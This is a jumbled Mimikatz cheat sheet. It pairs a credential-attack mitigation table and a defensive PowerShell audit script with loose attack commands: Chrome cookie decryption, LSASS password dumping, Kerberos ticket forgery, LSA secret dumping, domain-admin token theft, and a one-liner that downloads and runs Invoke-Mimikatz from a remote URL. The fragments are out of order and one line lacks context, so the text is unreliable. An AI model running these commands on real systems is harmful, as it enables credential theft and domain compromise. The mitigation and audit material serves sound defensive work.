dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect
| Attack | Mitigation |
|--------|------------|
| Credential dumping | Enable LSA Protection (`RunAsPPL`) and Credential Guard |
| WDigest cleartext | Disable WDigest caching: `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 0` |
| Pass-the-Hash | Restrict NTLM in favour of Kerberos, limit where admin accounts may log on, unique local admin passwords (LAPS), put privileged accounts in the Protected Users group |
| Golden Ticket | Rotate the KRBTGT password twice (wait for replication between resets), keep Tier 0 / DC access tightly limited; an RODC has its own KRBTGT account and does not protect the writable DCs' key |
| Pass-the-Ticket | Enable Kerberos Armoring (FAST), Protected Users (no RC4, shorter TGT lifetime) |
| LSASS access | Grant the "Debug programs" right (SeDebugPrivilege) only to accounts that need it, enable the Defender ASR rule "Block credential stealing from LSASS" |
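The following audit script is an added example and is not part of the original cheat sheet. It checks the host-level rows of the table (RunAsPPL, WDigest, Credential Guard, the LSASS ASR rule) and, where the ActiveDirectory module is available, the KRBTGT password age and Protected Users membership; `-Fix` applies the registry and ASR settings. Assumptions: it runs elevated on Windows 10/11 or Server 2016+, the ASR rule GUID is the one Microsoft publishes for "Block credential stealing from LSASS", and the 180-day KRBTGT threshold is a chosen policy, not a Microsoft default.

```powershell
#Requires -RunAsAdministrator
# Added example: audit (and optionally apply) the mimikatz mitigations from the table above.
param([switch]$Fix)

function Get-RegValue {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

$lsaPath     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$wdigestPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$asrLsass    = '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2'   # ASR rule: Block credential stealing from LSASS

$findings = @()

# 1. LSA Protection: 1 = enabled, 2 = enabled with UEFI lock. Takes effect after reboot.
$runAsPpl = Get-RegValue $lsaPath 'RunAsPPL'
$findings += [pscustomobject]@{ Control = 'LSA Protection (RunAsPPL)'; Value = $runAsPpl; Ok = ($runAsPpl -in 1, 2) }

# 2. WDigest: UseLogonCredential must be 0 so LSASS stops caching cleartext passwords.
$wdigest = Get-RegValue $wdigestPath 'UseLogonCredential'
$findings += [pscustomobject]@{ Control = 'WDigest UseLogonCredential'; Value = $wdigest; Ok = ($wdigest -eq 0) }

# 3. Credential Guard: SecurityServicesRunning contains 1 when it is actually running.
$dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
$cgRunning = [bool]($dg -and ($dg.SecurityServicesRunning -contains 1))
$findings += [pscustomobject]@{ Control = 'Credential Guard running'; Value = $cgRunning; Ok = $cgRunning }

# 4. Defender ASR rule state: 1 = Block (0 = Off, 2 = Audit, 6 = Warn).
$asrState = $null
$mp = Get-MpPreference -ErrorAction SilentlyContinue
if ($mp -and $mp.AttackSurfaceReductionRules_Ids) {
    $ids = @($mp.AttackSurfaceReductionRules_Ids | ForEach-Object { $_.ToLower() })
    $idx = [array]::IndexOf($ids, $asrLsass)
    if ($idx -ge 0) { $asrState = $mp.AttackSurfaceReductionRules_Actions[$idx] }
}
$findings += [pscustomobject]@{ Control = 'ASR: block LSASS credential theft'; Value = $asrState; Ok = ($asrState -eq 1) }

# 5. Domain-level checks, only when the AD module is present (e.g. on an admin workstation with RSAT).
if (Get-Module -ListAvailable -Name ActiveDirectory) {
    Import-Module ActiveDirectory
    $krbtgt  = Get-ADUser -Identity krbtgt -Properties PasswordLastSet
    $ageDays = (New-TimeSpan -Start $krbtgt.PasswordLastSet -End (Get-Date)).Days
    # 180 days is this script's chosen policy (rotate at least twice a year, two resets each time).
    $findings += [pscustomobject]@{ Control = 'KRBTGT password age (days)'; Value = $ageDays; Ok = ($ageDays -le 180) }
    $puCount = @(Get-ADGroupMember -Identity 'Protected Users' -Recursive).Count
    $findings += [pscustomobject]@{ Control = 'Protected Users members'; Value = $puCount; Ok = ($puCount -gt 0) }
}

$findings | Format-Table -AutoSize

# Remediation for the host-level items. RunAsPPL only becomes active after a reboot.
if ($Fix) {
    Set-ItemProperty -Path $lsaPath -Name 'RunAsPPL' -Type DWord -Value 1
    New-Item -Path $wdigestPath -Force | Out-Null
    Set-ItemProperty -Path $wdigestPath -Name 'UseLogonCredential' -Type DWord -Value 0
    Add-MpPreference -AttackSurfaceReductionRules_Ids $asrLsass -AttackSurfaceReductionRules_Actions Enabled
    Write-Host 'Settings applied; reboot for RunAsPPL to take effect.'
}
```

Run it as `.\Audit-LsassMitigations.ps1` for a report, or `.\Audit-LsassMitigations.ps1 -Fix` to apply the registry and ASR changes; the KRBTGT reset and Protected Users membership are deliberately left to a change-controlled process because a double KRBTGT reset without waiting for replication invalidates every TGT in the domain.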
Limited success; disabling it the normal way requires a reboot. Use the minidump approach instead.

mimikatz commands
kerberos::golden /user:User /domain:contoso.com /sid:S-1-5-21-... /target:web.contoso.com /service:HTTP /rc4:hash /ptt
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
Mimikatz must run as a local administrator or SYSTEM, and most sekurlsa:: commands also need SeDebugPrivilege (`privilege::debug`); the lsadump:: modules additionally want a SYSTEM token (`token::elevate`). Run these first:
lsadump::secrets
powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://.../Invoke-Mimikatz.ps1'); Invoke-Mimikatz"
sekurlsa::tickets
token::elevate /domainadmin
process::start cmd.exe